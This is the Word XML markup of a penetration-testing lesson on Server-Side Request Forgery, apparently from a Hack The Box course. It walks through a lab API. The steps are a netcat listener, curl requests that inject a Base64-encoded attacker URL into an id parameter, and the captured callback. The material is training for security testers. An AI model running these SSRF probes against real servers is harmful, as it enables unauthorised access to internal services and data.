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1EF93A" wp14:paraId="5A682471" wp14:textId="6BF8BC70">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" wp14:paraId="2E35C1BB" wp14:textId="7896E54E"/>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="4F39FC0F" wp14:textId="7A1810E2">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery (SSRF) attacks, listed in the OWASP top 10, allow us to abuse server functionality to perform internal or external resource requests on behalf of the server. We usually need to supply or modify URLs used by the target application to read or submit data. Exploiting SSRF vulnerabilities can lead to:</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="0353B392" wp14:textId="33E2EC97">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Interacting with known internal systems</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="14E4AC36" wp14:textId="1BDC1E1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Discovering internal services via port scans</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="687C21B1" wp14:textId="4903424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Disclosing local/sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="76954D43" wp14:textId="56B05C8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Including files in the target application</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="718E4015" wp14:textId="7621D32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Leaking NetNTLM hashes using UNC Paths (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="5A91312F" wp14:textId="4F65CDF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Achieving remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="1104508A" wp14:textId="5632A5B6">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">We can usually find SSRF vulnerabilities in applications or APIs that fetch remote resources. Our </w:t>
      </w:r>
      <w:hyperlink r:id="Recef7225f0994b2c">
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>Server-side Attacks</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> module covers SSRF in detail.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="43747EE4" wp14:textId="392F1153">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>As we have mentioned multiple times, though, we should fuzz every identified parameter, even if it does not seem tasked with fetching remote resources.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="64160079" wp14:textId="65E64464">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us assess together an API that is vulnerable to SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="7DD49F65" wp14:textId="680B1412">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Proceed to the end of this section and click on Click here to spawn the target system! or the Reset Target icon. Use the provided Pwnbox or a local VM with the supplied VPN key to reach the target API and follow along.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="6D3826AC" wp14:textId="562B3BC1">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Suppose we are assessing such an API residing in </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3000/api/userinfo.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="6575F404" wp14:textId="5FBDBDE8">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Let us first interact with it.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="6AF471E7" wp14:textId="01568075">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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 xml:space="preserve">yovecio@htb[/htb]$ curl </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3000/api/userinfo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{"success":false,"error":"'id' parameter is not given."}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="57FA6232" wp14:textId="0EB8C81B">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">The API is expecting a parameter called </w:t>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>. Since we are interested in identifying SSRF vulnerabilities in this section, let us set up a Netcat listener first.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="679EC2E2" wp14:textId="7D221784">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ nc -nlvp 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>listening on [any] 4444 ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="384DA5B1" wp14:textId="578D0C57">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, let us specify </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;VPN/TUN</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adapter IP&gt;:&lt;LISTENER PORT&gt; as the value of the </w:t>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter and make an API call.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="3343462E" wp14:textId="3CD72515">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ curl "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3000/api/userinfo?id=http://&lt;VPN/TUN Adapter IP&gt;:&lt;LISTENER PORT&gt;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>{"success":false,"error":"'id' parameter is invalid."}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="1E92ACA4" wp14:textId="560EBE6F">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">We notice an error about the </w:t>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter being invalid, and we also notice no connection being made to our listener.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="51DCBB18" wp14:textId="1F1543B8">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">In many cases, APIs expect parameter values in a specific format/encoding. Let us try Base64-encoding </w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;VPN/TUN</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adapter IP&gt;:&lt;LISTENER PORT&gt; and making an API call again.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="5F3EC28F" wp14:textId="1F5C5161">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>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yovecio@htb[/htb]$ echo "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;VPN/TUN</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adapter IP&gt;:&lt;LISTENER PORT&gt;" | tr -d '\n' | base64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>yovecio@htb[/htb]$ curl "</w:t>
      </w:r>
      <w:hyperlink>
        <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>http://&lt;TARGET</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP&gt;:3000/api/userinfo?id=&lt;BASE64 blob&gt;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="63AB6D00" wp14:textId="31C8BAF9">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>When you make the API call, you will notice a connection being made to your Netcat listener. The API is vulnerable to SSRF.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="4EF0D8A0" wp14:textId="3947500F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>yovecio@htb[/htb]$ nc -nlvp 4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>listening on [any] 4444 ...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>connect to [&lt;VPN/TUN Adapter IP&gt;] from (UNKNOWN) [&lt;TARGET IP&gt;] 50542</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Accept: application/json, text/plain, */*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>User-Agent: axios/0.24.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Host: &lt;VPN/TUN Adapter IP&gt;:4444</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Connection: close</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="7230689F" wp14:textId="66231B92">
      <w:pPr>
        <w:ind w:left="-20" w:right="-20"/>
      </w:pPr>
      <w:r w:rsidRPr="631EF93A" w:rsidR="631EF93A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>As time allows, try to provide APIs with input in various formats/encodings.</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="631EF93A" wp14:paraId="2DC08235" wp14:textId="486FC8D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c8eb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7AB4FA"/>
    <w:rsid w:val="0E7AB4FA"/>
    <w:rsid w:val="631EF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B4FA"/>
  <w15:chartTrackingRefBased/>
